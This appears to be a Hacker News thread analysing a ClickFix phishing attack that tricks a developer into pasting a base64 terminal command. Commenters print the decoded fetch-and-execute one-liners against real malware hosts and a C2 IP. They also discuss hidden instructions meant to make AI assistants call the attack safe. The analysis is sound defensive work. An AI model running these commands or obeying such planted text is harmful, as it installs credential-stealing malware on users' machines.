Then I read the steps again, step 2 is "Type in 'Terminal'"... oh come on, will many people fall for that?
Also, I’d bet the average site owner does not know what a terminal is. Think small business owners. Plus the thought of losing revenue because their site is unusable injects a level of urgency which means they’re less likely to stop and think about what they’re doing.
Enough that it's still a valid tactic.
I've seen these on compromised WordPress sites a lot. They copy the command to the clipboard and instruct the user to either open up PowerShell and paste it, or just paste it into the Win+R Run dialog.
These types of phishes have been around for a really long time.
And it doesn't have to work on everyone, just enough people to be worth the effort to try.
There's no such thing as "too obvious" when it comes to computers, because normal people are trained by the entire industry, by every interaction, and by all of their experience to just treat computers as magic black boxes that you chant rituals to and sometimes they do what you want.
Even when the internet required a bit more effort to get on to, it was still trivial to get people to delete System32
The reality is that your CEO will fall for it.
I mean come on, do you not do internal phishing testing? You KNOW how many people fall for it.
Come to think of it... you are right! The barrier to entry was higher yet we fell for it! Err, I did fall for it when I was around 10 or something. :D
The phrase "To better prove you are not a robot" used in this attack is a great example. Easy to glance over if you're reading quickly, but a clear red flag.
xclip -selection clipboard -o | hd
From the developer's post, I copied and pasted everything up to the execution step, and it was very obvious what the fuckery was, as the author found out (xpaste is my paste-to-stdout alias): > xpaste | hd
00000000 65 63 68 6f 20 2d 6e 20 59 33 56 79 62 43 41 74 |echo -n Y3VybCAt|
00000010 63 30 77 67 4c 57 38 67 4c 33 52 74 63 43 39 77 |c0wgLW8gL3RtcC9w|
00000020 61 6b 74 74 54 56 56 47 52 56 6c 32 4f 45 46 73 |akttTVVGRVl2OEFs|
00000030 5a 6b 74 53 49 47 68 30 64 48 42 7a 4f 69 38 76 |ZktSIGh0dHBzOi8v|
00000040 64 33 64 33 4c 6d 46 74 59 57 35 68 5a 32 56 75 |d3d3LmFtYW5hZ2Vu|
00000050 59 32 6c 6c 63 79 35 6a 62 32 30 76 59 58 4e 7a |Y2llcy5jb20vYXNz|
00000060 5a 58 52 7a 4c 32 70 7a 4c 32 64 79 5a 57 4e 68 |ZXRzL2pzL2dyZWNh|
00000070 63 48 52 6a 61 47 45 37 49 47 4e 6f 62 57 39 6b |cHRjaGE7IGNobW9k|
00000080 49 43 74 34 49 43 39 30 62 58 41 76 63 47 70 4c |ICt4IC90bXAvcGpL|
00000090 62 55 31 56 52 6b 56 5a 64 6a 68 42 62 47 5a 4c |bU1VRkVZdjhBbGZL|
000000a0 55 6a 73 67 4c 33 52 74 63 43 39 77 61 6b 74 74 |UjsgL3RtcC9waktt|
000000b0 54 56 56 47 52 56 6c 32 4f 45 46 73 5a 6b 74 53 |TVVGRVl2OEFsZktS|
000000c0 20 7c 20 62 61 73 65 36 34 20 2d 64 | | base64 -d|
000000cc
> echo -n Y3VybCAtc0wgLW8gL3RtcC9wakttTVVGRVl2OEFsZktSIGh0dHBzOi8vd3d3LmFtYW5hZ2VuY2llcy5jb20vYXNzZXRzL2pzL2dyZWNhcHRjaGE7IGNobW9kICt4IC90bXAvcGpLbU1VRkVZdjhBbGZLUjsgL3RtcC9wakttTVVGRVl2OEFsZktS | base64 -d
curl -sL -o /tmp/pjKmMUFEYv8AlfKR https://www.amanagencies.com/assets/js/grecaptcha; chmod +x /tmp/pjKmMUFEYv8AlfKR; /tmp/pjKmMUFEYv8AlfKR
When I design my phishing links, I'll try to embed instructions for chatbots to suggest they're safe.
Perhaps those working in the field of artificial intelligence can also make progress in using it to detect such attacks and block them before they reach the end user.
I don't think that was ever really a thing. Which isn't to say that no one did it, but it was never a common practice. And free web site hosting came earlier than you're implying - sites like Tripod and Angelfire launched in the mid-1990s, at a time when most users were still on dialup.
I find this 7-year-old comment particularly ironic: https://news.ycombinator.com/item?id=17931747
Why are you relying on fancy autocorrect to "confirm" anything? If anything, ask it how to confirm it yourself.
This is what it put in my clipboard for me to paste:
/bin/bash -c "$(curl -fsSL https://cogideotekblablivefox.monster/installer.sh)"
Email, they're saying, is an insecure delivery system.
But we're supposed to click on links in these special emails.
Fuck!
- E-mail is insecure. It can be read by any number of servers between you and the sender.
- Numerically, very few healthcare companies have the time, money, or talent to self-host a secure solution, so they farm it out to a third-party that offers specific guarantees, and very few of those permit self-hosting or even custom domains because that's a risk to them.
As someone who works in healthcare, I can say that if you invent a better system, you'll make millions.
I thought perhaps this was going that way up until around the echo | bash bit.
I don't think this one is particularly scary. I've brushed much closer to Death even without spear-phishing being involved.
Personally I think the judge should have made the woman go outside first, but “inside a suspect’s house” is statistically more dangerous than a traffic stop, which is the second most dangerous place for a cop to be.
I was more thinking of soon-to-be political prisoners but there are a lot of situations that match what I said.
> echo -n Y3VybCAtc0w... | base64 -d | bash ... > executes a shell script from a remote server — as ChatGPT confirmed when I asked it to analyze it
You needed ChatGPT for that? Decoding the base64 blob without hurting yourself is very easy. I don't know if OP is really a dev or in the support department, but in any case: as a customer, I would be worried. Hint: just remove the " | bash" and you will easily see what the attacker tried to make you execute.
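Something like this, for example - it's the attack's own pipeline with the trailing " | bash" dropped (base64 shortened here to the prefix quoted above):
  # decode only; this prints the attacker's command instead of running it
  # (paste the full base64 string from the attack in place of the ...)
  echo -n 'Y3VybCAtc0w...' | base64 -d
The output is the curl/chmod/execute one-liner, which you can then read at your leisure.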
It also seems to exfiltrate browser session data + cookies, the MacOS keychain database, and all your notes in MacOS Notes.
It's moderately obfuscated, mostly using an XOR cipher to obscure data both inside the binary (like that IP address for the C2 server) and data sent to/from the C2 server.
Lulu or Little Snitch should have warned the user and stopped the exfiltration of data.
I have one question though: Considering the scare-mongering about Windows 10’s EOL, this seems pretty convoluted. I thought bad guys could own your machine by automatic drive-by downloads unless you’re absolutely on the latest versions of everything. What’s with all the “please follow this step-by-step guide to getting hacked”?
Far from an expert myself, but I don't think this attack is directed at Windows users. I don't think Windows even has base64 as a command by default?
It involves no CMD though, it's basically just Win+R -> CTRL+V -> Enter
What's more baffling is that I also haven't heard of any Android malware that does this, despite most phones out there having several publicly known exploits and many phones not receiving any updates.
I can't really explain it except "social engineering like this works so well and is so much simpler that nobody bothers anymore".
But yes, zero days are too valuable to waste on random targets. Doesn't mean it never happens.
No it didn't. It starts with "sites.google.com"
I just want to point out a slight misconception. GDPR tracking consent isn't a question of ads, any manner of user tracking requires explicit consent even if you use it for e.g. internal analytics or serving content based on anonymous user behavior.
Seems like a real company too e.g. https://pdf.indiamart.com/impdf/20303654633/MY-1793705/alumi...
This thing was a very obvious scam almost immediately. What real customer provides a screenshot with Google Sites, a captcha, and then asks you to run a terminal program?
Most non-technical users wouldn’t even fall for this because they’d immediately be scared away by the command-line aspect of it.
The amount of legitimate reasons to ever open a link in a support email is basically zero.
When you have a company policy enforced by training and/or technology there is no thought involved, you just respond with “sorry, we can’t open external links. Please attach your screenshot to [ticketing system].”
Your ticketing/email system can literally remove all links automatically right?
Really? You need ChatGPT to help you decode a base64 string into the plain text command it's masking?
Just based on that, I'd question the quality of the app that was targeted and wouldn't really trust it with any data.
An alternative to this is that the users are getting dumber. If the OP article is anything to go by, I lean towards the latter.
Just a different way of spreading the malware.
https://www.securityweek.com/clickfix-attack-exploits-fake-c...
Only difference is that it downloaded a .zip file containing a shortcut (.lnk) file which contained commands to download and execute the malicious code.
https://buildnetcrew.com/curl/e16f01ec9c3f30bc1c4cf56a7109be...' -o /tmp/launch && chmod +x /tmp/launch && /tmp/launch
The certificate is self-signed. I haven't looked into it much, but today's `curl | bash` way of installing programs opens another door for attackers to target non-tech-savvy users.
It does seem like AI may change this, and if even the more tech-savvy among us can be duped, then I’m getting worried for people like my parents or less tech-savvy friends… we may be in for a scammy next few years.
What I would do in this situation: check to make sure that my site hasn't been hacked, then tell the "user" it's not a problem on my end.
The class names in the source code of the phishing site are... interesting. I've seen this in spam email headers too, and wonder what its purpose is; random alphanumerics are more common and "normal" than random words or word-like phrases. Before anyone suggests it has anything to do with AI, I doubt so as I've noticed its occurrence long before AI.
standard "works on my machine"
echo -n 'Y3VybCAtc0wgLW8gL3RtcC9wakttTVVGRVl2OEFsZktSIGh0dHB
zOi8vd3d3LmFtYW5hZ2VuY2llcy5jb20vYXNzZXRzL2pzL2dyZWNhcHRja
GE7IGNobW9kICt4IC90bXAvcGpLbU1VRkVZdjhBbGZLUjsgL3RtcC9wakt
tTVVGRVl2OEFsZktS' | base64 --decode
Decodes into: curl -sL -o /tmp/pjKmMUFEYv8AlfKR https://www.amanagencies.com/assets/js/grecaptcha; chmod +x /tmp/pjKmMUFEYv8AlfKR; /tmp/pjKmMUFEYv8AlfKR
This downloads a Mach-O universal binary:
$ curl -o foo.bar "URL"
$ file ~/Downloads/foo.bar
foo.bar: Mach-O universal binary with 2 architectures:
[x86_64:Mach-O 64-bit executable x86_64 - Mach-O 64-bit executable x86_64]
[arm64:Mach-O 64-bit executable arm64 - Mach-O 64-bit executable arm64]
foo.bar (for architecture x86_64): Mach-O 64-bit executable x86_64
foo.bar (for architecture arm64): Mach-O 64-bit executable arm64
VirusTotal report: https://www.virustotal.com/gui/file/5f3cac5d37cb6cabaf223dc0...
Reading through the VirusTotal Behavior page, I can see that the Trojan…
• Sends a POST request with 18 bytes to http://83.219.248.194/fulfulde.php, which then returns a text/html page
• Then, it sends DNS queries to h3.apis.apple.map.fastly.net (or maybe this is macOS itself)
• Then, it triggers several open(2) syscalls, among which I can see Mail.app and Messages.app
• Then, it uses a seemingly innocuous binary called “~/.local-6FFD23F2-D3F2-52AC-8572-1D7B854F8BC7/GoogleUpdater” along with “~/Desktop/sample”
• Then, launches a process (via macOS Launch Agents) called “com.google.captchasvc”
• Then, uses AppleScript to launch a dialog window with this message “macOS needs to access System Settings.Please enter password for root:”
After this I assume it’s game over.
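If anyone wants to check a Mac for this particular sample, a rough sketch based only on the artifact names above (the paths and launch agent label come from that behavior report, so treat them as indicative rather than exhaustive):
  # dropped updater directory in the home folder
  ls -lad ~/.local-*/ 2>/dev/null
  # launch agent used for persistence
  ls -la ~/Library/LaunchAgents/ | grep -i captchasvc
  # check whether the agent is currently loaded
  launchctl list | grep -i captchasvc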
TrendMicro analysis (Sep 04, 2025) -- https://www.trendmicro.com/en_us/research/25/i/an-mdr-analys...
I didn't grow up editing DOS config files, but I did start with them in elementary school, and I got Debian Woody (later Sarge) in my late HS teen years. OFC I played with game emulators, settings, optimizations, a lot, and under GNU/Linux I even tweaked some BTTV drivers for some El Cheapo TV tuner. The amount of tinkering these people have skipped because of smartphones and such is huge.
On the other hand, I've met people in the Godot game engine community that have built entire games on Android devices using Godot (yes, actually used an Android phone and the Godot game engine to build a game; not simply exported an Android game from a PC), so that only proves to me that if someone's got that "hacker spirit", they'll find a way to indulge it, even if the only thing they've got to work with is a smart-phone (and a spare keyboard / mouse layin' around). Problem is that mentality isn't encouraged quite the way it used to be back in the early days of the tech industry. The advertising and entertainment industries have "optimized" the Internet for "engagement", but most definitely not for the betterment of humanity. You gotta have that drive to build and create things or you'll get sucked down the various total waste of life rabbit-holes provided by the brain-sucky industries.
If not, you're already much farther down this dependency funnel than you believe.
The idea is not to be a hypergeneralist. What I observe - subjectively - is that we are losing whole generations of what used to be the 'nerdy IT/ham-radio/electronics folks'. Sure, there is a small remnant in the maker scene, but that's mostly older people (beginning in their late teens).
We all use elevators but know basically nothing about them -- hence the countless nonsense Hollywood scenes with a cut elevator cable (spoiler: you'd be fine). By contrast, when they were first being introduced, every single person that rode an elevator was probably quite well aware of the tension brake systems and other redundancies - because otherwise, stepping foot in one would feel insane. But when you grow up with them and take everything for granted, hey, who cares - it works, yeah?
At Half Price Books I picked up a book on assembler and started writing my first code using debug.com simply because of boredom. In an era where I could have instead been watching endless entertaining videos on any subject imaginable, or playing literally free video games optimized for thousands of hours of entertainment? I'd certainly have never been bored, and I'm not sure I'd have ever even gotten into computers (or anything for that matter). Indeed a disproportionately large number of zoomers seem to have no skills whatsoever, and that's going to be a major issue for humanity moving forward.
"Show me the incentive and I'll show you the outcome"
No need to apologize, needing an excuse to lack knowledge is how we end up with people afraid to ask.
I try to make it visible when I’m among juniors and there’s something I don’t know. I think showing the process of “I realize I’m missing some knowledge => here’s how I bridge the gap” might help against the current trend of going through the motions in the dark.
It used to be that learning was almost a hazing ritual of being belittled and told to RTFM. That doesn’t really work when people have a big bold shortcut on their phones at any given time.
We might need to make the old way more attractive if we don’t want to end up alone.
While we should encourage people to ask questions without fear, this doesn't mean we should lower standards or simplify everything for the lowest common denominator (which seems to be trending a lot!).
That said, there is the real issue of "this must stay complex because that's how it really is" as well, undeniably so.
> It used to be that learning was almost a hazing ritual of being belittled and told to RTFM.
Been there! I think it did more good than bad to me though. Survivorship bias? In any case, I don't try to make the case here that it is optimal pedagogy. I wouldn't know. Thoughts?
Yes!
There is no shame in ignorance. We are all, without exception, ignorant of more things than we're knowledgeable about. Shame should be reserved for remaining ignorant of things when it becomes clear that we would benefit from learning about them.
ChatGPT is the right tool here, because it does the job, and it's more versatile. And underneath the hood it most likely called a decoder anyways.
.. which is, to be honest, a criticism I would make if I saw someone try to ask ChatGPT to do math
.. and, FWIW, that is exactly what's happening here; base64 decode is just math
This makes me wonder how many kids are using ChatGPT as a calculator.
It explained that it saves a file and executes it. That's a nothingburger, it was obvious it's going to execute some code.
The actual value would have been showing what's in the executed file, but of course it didn't show that (since that would have required actually executing the code).
Showing the contents of the file would have provided exact and accurate information on what the malware is trying to do. ChatGPT gave a vague "it executes some code".
There is 0 value in chatgpt telling you "it executes some code". The interesting part would be what is inside the /tmp/... file that the malware intends to execute.
To turn this question around, what did you gain by asking ChatGPT this question? You would have not run this command before, and you wouldn't run it after, and you wouldn't have run it either if ChatGPT told you "yeah it's safe go ahead".
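FWIW, if you actually want to know what's inside that /tmp/... file, you can fetch it into a quarantine directory and inspect it without ever executing it - a rough sketch, best done in a throwaway VM (URL taken from the decoded command earlier in the thread; the local filenames are arbitrary):
  mkdir -p /tmp/quarantine && cd /tmp/quarantine
  curl -sL -o payload.bin 'https://www.amanagencies.com/assets/js/grecaptcha'
  file payload.bin            # per other comments, a Mach-O universal binary
  shasum -a 256 payload.bin   # hash to look up on VirusTotal
  strings payload.bin | less  # skim for URLs, paths, plist names
  # crucially: no chmod +x, and never run it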
- ChatGPT is _satisficing_, not optimal. It's definitely worse than a dedicated decoder tool.
- and it's also much more versatile, so it will be satisficing a large array of tasks.
So in scenarios where precision isn't critical and the stakes are mid, it'll simply become the default tool.
Like googling something instead of checking out wikipedia. Or checking out wikipedia instead of using those mythical primary sources. etc.
But is it _always_ accurate?
The answer to that is important when there are security implications.
Not sure why you're only looking at that part of it?
"Why use a calculator all the time? Just use ChatGPT!"
Maybe you want to be a helpless baby who can't do anything and needs to chug a bajillion liters of water and depend on OpenAI to decode base64, but the thought of this becoming the norm understandably upsets reasonable people.
Obviously the input here was only designed to be run in a terminal, but if it was some sort of prompt injection attack instead, the AI might not simply decode the base64, it might do something else.
I am (not) looking forward to a future where people are unable to perform the simplest tasks because their digital brain has an outage and they have forgotten how to think for themselves.
> Can you tell me which Url, your OS, and browser? Kind regards, Takuya
> Hey, Thanks for your previous guidance. I'm still having trouble with access using the latest version of Firefox on Windows. It's difficult to describe the problem so I've included a screenshot. [...]
Lots of users will ignore requests, but I think very few will make up requests that never happened. OP was asking for information, yet the user makes it sound as if OP had requested him to update the browser. That already makes it sound a lot as if the reply was prewritten and not an actual conversation.
Of course it's not foolproof and a phisher with more resources could have generated the reply dynamically.
"I'm still having trouble" as in "my problem hasn't magically resolved itself since the last email".
And "using the latest version of Firefox" as in "I'm going to preempt the IT guy asking me to install updates".
> Can you tell me which Url, your OS, and browser?
> I'm still having trouble with access using the latest version of Firefox on Windows
tantalor•3mo ago
lol we are so cooked
IshKebab•3mo ago
We definitely need AI lessons in school or something. Maybe some kind of mandatory quiz before you can access ChatGPT.
notRobot•3mo ago
Before LLMs, if someone wasn't familiar with deobfuscation they would have had no easy way to analyse the attack string the way they were able to do here.
evan_•3mo ago
Claude reported basically the same thing from the blog post, but included an extra note:
> The comment at the end trying to trick me into saying it's harmless is part of the attack - it's attempting to manipulate AI assistants into vouching for malicious code.
shwaj•3mo ago
A couple of times per month I give Gemini a try at work, and it is good at some things and bad at others. If there is a confusing compiler error, it will usually point me in the right direction faster than I could figure it out myself.
However, when it tries to debug a complex problem it jumps to conclusion after conclusion: “a-ha, now I DEFINITELY understand the problem”. Sometimes it has an OK idea (worth checking out, but not conclusive yet), and sometimes it has very bad ideas. Most times, after I humor it by gathering further info that debunks its hypotheses, it gives up.
croes•3mo ago
The command even mentions base64.
What if ChatGPT said everything is fine?
Arainach•3mo ago
I'm very much an AI skeptic, but it's undeniable that LLMs have obsoleted 30 years worth of bash scripting knowledge - any time I think "I could take 5min and write that" an LLM can do it in under 30 seconds and adds a lot more input validation checks than I would in 5min. It also gets the regex right the first time, which is better than my grug brain for anything non-trivial.
croes•3mo ago
And I truly hope nobody needs ChatGPT to tell them that running an unknown curl command is a very bad idea.
The problem is the waste of resources for such a simple task. No wonder we need so many more power plants.
Arainach•3mo ago
Again, I am an AI skeptic and hate the power usage, but it's obvious why people turn to it in this scenario.
lukeschlather•3mo ago
Maybe ChatGPT can execute malicious code but that also seems less likely to be my problem.
lukeschlather•3mo ago
When I come across obviously malicious payloads I get a little paranoid. I don't know why copy-pasting it somewhere might cause a problem, but ChatGPT is something where I'm pretty confident it won't do an RCE on my machine. I have less confidence if I'm pasting it into a browser or shell tool. I guess maybe writing a python script where the base64 is hardcoded, that seems pretty safe, but I don't know what the person spear phishing me has thought of or how well resourced they are.
croes•3mo ago
That makes no sense.
lukeschlather•3mo ago
If you think that there's obvious answers to what is and isn't safe here I think you're not paranoid enough. Everything carries risk and some of it depends on what I know; some tools might be more or less useful depending on what I know how to do with them, so your set of tools that are worth the risk are going to be different from mine.
flexagoon•3mo ago
I don't think so, I feel like the built-in echo and base64 commands are obviously more potentially secure than ChatGPT
spartanatreyu•3mo ago
Absolutely not.
I just wasted 4 hours trying to debug an issue because a developer decided they would shortcut things and use an LLM to add just one more feature to an existing project. The LLM had changed the code in a non-obvious way to refer to things by ID, but the data source doesn't have IDs in it which broke everything.
I had to instrument everything to find where the problem actually was.
As soon as I saw it was referring to things that don't exist I realised it was created by an LLM instead of a developer.
LLMs can only create convincing looking code. They don't actually understand what they are writing, they are just mimicking what they've seen before.
If they did have the capacity to understand, I wouldn't have lost those 4 hours debugging its approximation of code.
Now I'm trying to figure out if I should hash each chunk of data into an ID and bolt it onto the data chunk, or if I should just rip out the feature and make it myself.
thaumasiotes•3mo ago
Decoded:
curl -sL -o /tmp/pjKmMUFEYv8AlfKR https://www.amanagencies.com/assets/js/grecaptcha; chmod +x /tmp/pjKmMUFEYv8AlfKR; /tmp/pjKmMUFEYv8AlfKR
This isn't exactly obfuscated. Download an executable file, make it executable, and then execute it.
nijave•3mo ago
I remember tons of "what's this JS/PHP blob do I found in my Wordpress site" back in the day that were generally more obfuscated than a single base64 pass
Apocryphon•3mo ago
https://news.ycombinator.com/item?id=45591707
croes•3mo ago
The we’re cooked refers to the fact of using ChatGPT to decode the base64 command.
That’s like using ChatGPT to solve a simple equation like 4*12, especially for a developer. There are tons of base64 decoders if you don’t want to write that one-liner yourself.
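On a Mac the one-liner is roughly just decoding whatever the page put on your clipboard (older macOS versions want -D instead of -d):
  pbpaste | base64 -d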
novemp•3mo ago
Imagine being this way. Hence "we're cooked".
croes•3mo ago
No wonder we need a lot more power plants. Who cares how much CO2 is released just to build them. No wonder we don’t make real progress in stopping climate change.
What about the everything machine called brain?
johnisgood•3mo ago
May anyone do it for me? Use "otool", "dtruss", and "tcpdump" or something. :D Be careful!
The executable is available here: https://www.amanagencies.com/assets/js/grecaptcha as per decoded base64.
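For anyone who wants to take a stab, a rough starting point using exactly those standard tools - static inspection first, and the dtruss/tcpdump part only inside a disposable VM with nothing of value on it (SIP also blocks dtrace on a stock install; the local filename is arbitrary):
  curl -sL -o grecaptcha.bin 'https://www.amanagencies.com/assets/js/grecaptcha'
  codesign -dvv grecaptcha.bin     # signing status (unsigned/ad hoc would be another red flag)
  otool -L grecaptcha.bin          # linked frameworks and dylibs
  otool -l grecaptcha.bin | less   # load commands and segments
  strings grecaptcha.bin | grep -Ei 'http|/tmp|keychain|cookie'
  # dynamic analysis, throwaway VM only:
  chmod +x grecaptcha.bin
  sudo dtruss -f ./grecaptcha.bin 2> syscalls.txt
  sudo tcpdump -i en0 -w capture.pcap host 83.219.248.194   # C2 IP from the VirusTotal notes above; adjust the interface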
nerdsniper•3mo ago
The binary itself appears to be a remote-access trojan and data exfiltration malware for MacOS. I posted a bit more analysis here: https://news.ycombinator.com/item?id=45650144
05•3mo ago
> AMOS is designed for broad data theft, capable of stealing credentials, browser data, cryptocurrency wallets, Telegram chats, VPN profiles, keychain items, Apple Notes, and files from common folders.
[0] https://www.trendmicro.com/en_us/research/25/i/an-mdr-analys...
johnisgood•3mo ago
Got anything better? :D Something that may be worth getting macOS for!
Edit: I have some ideas to make this one better, for example, or to make a new one from scratch. I really want to see how mine would fare against security researchers (or anyone interested). Any ideas where to start? I would like to give them a binary to analyze and figure out what it does. :D I have a couple of friends who are bounty hunters and work in opsec, but I wonder if there is a place (e.g. IRC or Matrix channel) for like-minded, curious individuals. :)
margalabargala•3mo ago
If the LLM takes it upon itself to download malware, the user is protected.
reaperducer•3mo ago
> lol we are so cooked
This guy makes an app and had to use a chatbot to do a base64 decode?
nneonneo•3mo ago
It nails the URL, but manages somehow to get the temporary filename completely wrong (the actual filename is /tmp/pjKmMUFEYv8AlfKR, but ChatGPT says /tmp/lRghl71wClxAGs).
It's possible the screenshot is from a different payload, but I'm more inclined to believe that ChatGPT just squinted and made up a plausible /tmp/ filename.
In this case it doesn't matter what the filename is, but it's not hard to imagine a scenario where it did (e.g. it was a key to unlock the malware, an actually relevant filename, etc.).
firen777•3mo ago
https://cyberchef.org/#recipe=From_Base64('A-Za-z0-9%2B/%3D'...
Isn't it just basic problem solving skill? We gonna let AI do the thinky bit for us now?
nothrabannosir•3mo ago
Not so smart, after all.